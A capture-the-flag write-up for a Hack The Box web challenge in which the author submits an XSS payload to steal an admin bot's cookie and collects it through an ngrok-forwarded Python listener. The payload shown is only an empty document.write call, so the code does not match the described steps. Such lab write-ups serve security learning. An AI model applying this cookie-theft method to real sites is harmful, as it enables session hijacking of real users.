Tags: web xss
Rating: 1.0
#HTB Cyber Santa is Coming to Town
#Web - Toy Workshop
We got an IP address and port to connect to using http along with a download of the docker image. Just from examening the files we downloaded we can see there is a submit api, not sure the formatting yet though for submissions. Looking at the html for the website we can see there is a submit form that is hidden. If we unhide it, it will format and submit the POST request for us. Using this and the knowledge that there is a bot with a flag hidden in the cookie of the bot, by looking at the files downloaded, I submitted a commonly used XSS html. To get this to work, because the website was on WLAN, I spun up ngrok and had it forward to the local python webserver I also spun up in another terminal window. Once I submitted the script below, I waited a few seconds and then I recieved the flag in the header of the GET request from the bot.
<script>
document.write('');
</script>